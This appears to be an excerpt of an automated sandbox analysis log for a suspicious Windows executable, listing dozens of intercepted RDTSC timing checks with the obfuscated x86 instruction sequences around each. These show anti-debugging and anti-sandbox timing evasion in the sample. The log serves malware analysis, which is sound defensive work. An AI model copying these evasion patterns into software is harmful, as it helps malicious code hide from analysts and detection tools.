Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D21DF9 second address: D21E22 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F07E8D7A956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F07E8D7A95Ah 0x00000011 jmp 00007F07E8D7A963h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D2257D second address: D22589 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D226F7 second address: D22736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F07E8D7A95Bh 0x00000008 jmp 00007F07E8D7A95Eh 0x0000000d jnl 00007F07E8D7A956h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F07E8D7A968h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D26F15 second address: D26F45 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F07E8CE6A8Ah 0x0000000e nop 0x0000000f pushad 0x00000010 adc ch, 00000021h 0x00000013 stc 0x00000014 popad 0x00000015 push 00000004h 0x00000017 movzx edx, ax 0x0000001a or edx, 783AB0D4h 0x00000020 push 1D004F3Bh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D26F45 second address: D26F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D26F49 second address: D26F53 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F07E8CE6A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D286AE second address: D286CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8D7A95Bh 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: D286CC second address: D286E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jbe 00007F07E8CE6A97h 0x0000000f jmp 00007F07E8CE6A8Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53F0031 second address: 53F00AB instructions: 0x00000000 rdtsc 0x00000002 call 00007F07E8D7A968h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F07E8D7A95Bh 0x0000000f pushfd 0x00000010 jmp 00007F07E8D7A968h 0x00000015 or si, D6E8h 0x0000001a jmp 00007F07E8D7A95Bh 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 push ebp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F07E8D7A960h 0x0000002c and si, E948h 0x00000031 jmp 00007F07E8D7A95Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0E89 second address: 53D0EF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F07E8CE6A8Fh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F07E8CE6A8Bh 0x00000018 add si, 2A3Eh 0x0000001d jmp 00007F07E8CE6A99h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F07E8CE6A90h 0x00000029 sbb ah, 00000038h 0x0000002c jmp 00007F07E8CE6A8Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0EF1 second address: 53D0F25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F07E8D7A95Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0F25 second address: 53D0F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0F29 second address: 53D0F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0F2D second address: 53D0F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 542002F second address: 542004C instructions: 0x00000000 rdtsc 0x00000002 mov ah, F4h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007F07E8D7A95Ah 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop eax 0x00000015 mov ch, dl 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 542004C second address: 5420052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5420052 second address: 5420056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5420056 second address: 5420066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5420066 second address: 542006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 542006A second address: 5420070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B00B0 second address: 53B0127 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F07E8D7A962h 0x00000008 sub eax, 5F12E108h 0x0000000e jmp 00007F07E8D7A95Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F07E8D7A966h 0x0000001d push eax 0x0000001e pushad 0x0000001f call 00007F07E8D7A961h 0x00000024 pushfd 0x00000025 jmp 00007F07E8D7A960h 0x0000002a and ah, FFFFFFC8h 0x0000002d jmp 00007F07E8D7A95Bh 0x00000032 popfd 0x00000033 pop ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B0127 second address: 53B0185 instructions: 0x00000000 rdtsc 0x00000002 mov ch, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F07E8CE6A98h 0x0000000f adc ecx, 647C9B58h 0x00000015 jmp 00007F07E8CE6A8Bh 0x0000001a popfd 0x0000001b call 00007F07E8CE6A98h 0x00000020 pushad 0x00000021 popad 0x00000022 pop esi 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F07E8CE6A8Ah 0x0000002d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B0185 second address: 53B01B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c jmp 00007F07E8D7A966h 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B01B6 second address: 53B01D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0BE1 second address: 53D0BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0BE7 second address: 53D0BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0BED second address: 53D0BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0BF1 second address: 53D0BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0BF5 second address: 53D0C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F07E8D7A95Dh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F07E8D7A95Eh 0x00000014 mov ebp, esp 0x00000016 jmp 00007F07E8D7A960h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0C33 second address: 53D0C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0C37 second address: 53D0C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0C3B second address: 53D0C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0C41 second address: 53D0C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A95Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D087E second address: 53D0884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0884 second address: 53D0888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D0888 second address: 53D088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D088C second address: 53D08BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F07E8D7A95Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F07E8D7A960h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410F19 second address: 5410F40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F07E8CE6A95h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410F40 second address: 5410F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410F46 second address: 5410F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410F4A second address: 5410F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53F03B9 second address: 53F03C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53F03C8 second address: 53F0448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F07E8D7A95Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx ebx, cx 0x00000014 pushfd 0x00000015 jmp 00007F07E8D7A95Ah 0x0000001a adc eax, 72B76D88h 0x00000020 jmp 00007F07E8D7A95Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F07E8D7A966h 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 mov dx, si 0x00000033 mov di, cx 0x00000036 popad 0x00000037 mov eax, dword ptr [ebp+08h] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F07E8D7A95Bh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0EB0 second address: 53E0EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0EB8 second address: 53E0EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A95Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0EC7 second address: 53E0ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0ECB second address: 53E0EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F07E8D7A962h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0EE9 second address: 53E0F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F07E8CE6A91h 0x0000000b and esi, 36FA0366h 0x00000011 jmp 00007F07E8CE6A91h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F07E8CE6A8Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0F29 second address: 53E0F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7AEB74D9h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, edi 0x00000012 mov bl, 64h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0F3E second address: 53E0F44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53E0F44 second address: 53E0F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 541073A second address: 54107E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F07E8CE6A92h 0x0000000f add ecx, 7FF05748h 0x00000015 jmp 00007F07E8CE6A8Bh 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F07E8CE6A96h 0x00000022 mov ebp, esp 0x00000024 jmp 00007F07E8CE6A90h 0x00000029 xchg eax, ecx 0x0000002a pushad 0x0000002b jmp 00007F07E8CE6A8Eh 0x00000030 mov ecx, 50203FA1h 0x00000035 popad 0x00000036 push eax 0x00000037 jmp 00007F07E8CE6A97h 0x0000003c xchg eax, ecx 0x0000003d pushad 0x0000003e call 00007F07E8CE6A94h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54107E3 second address: 54107FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 mov eax, dword ptr [76FB65FCh] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 mov ecx, 596EF561h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54107FB second address: 5410809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A8Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410809 second address: 541081F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F07E8D7A95Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 541081F second address: 5410881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F085A809BBEh 0x0000000f jmp 00007F07E8CE6A96h 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 push edi 0x00000018 movzx eax, di 0x0000001b pop edi 0x0000001c popad 0x0000001d xor eax, dword ptr [ebp+08h] 0x00000020 pushad 0x00000021 jmp 00007F07E8CE6A97h 0x00000026 push esi 0x00000027 movsx ebx, cx 0x0000002a pop eax 0x0000002b popad 0x0000002c and ecx, 1Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov cx, F2CFh 0x00000036 mov ebx, eax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410881 second address: 54108DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F07E8D7A967h 0x00000008 call 00007F07E8D7A968h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 ror eax, cl 0x00000013 jmp 00007F07E8D7A961h 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F07E8D7A95Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54108DA second address: 5410903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00A82014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F07ED6B72B8h 0x00000024 push FFFFFFFEh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F07E8CE6A8Dh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410903 second address: 5410913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A95Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410913 second address: 5410917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410917 second address: 541092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F07E8D7A95Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 541092C second address: 5410947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F07ED6B72FBh 0x00000011 mov edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 mov cl, 89h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410947 second address: 541094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 541094D second address: 5410951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410951 second address: 5410965 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, 1E9Ch 0x00000010 movsx edi, ax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5410965 second address: 54109A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F07E8CE6A8Dh 0x00000009 sbb ah, FFFFFFF6h 0x0000000c jmp 00007F07E8CE6A91h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F07E8CE6A96h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54109A9 second address: 54109AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54109AF second address: 54109CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F07E8CE6A8Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54109CA second address: 54109D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0011 second address: 53C002D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C002D second address: 53C0031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0031 second address: 53C0035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0035 second address: 53C003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C003B second address: 53C008D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F07E8CE6A90h 0x00000009 or esi, 77013DB8h 0x0000000f jmp 00007F07E8CE6A8Bh 0x00000014 popfd 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F07E8CE6A92h 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F07E8CE6A8Dh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C008D second address: 53C0092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
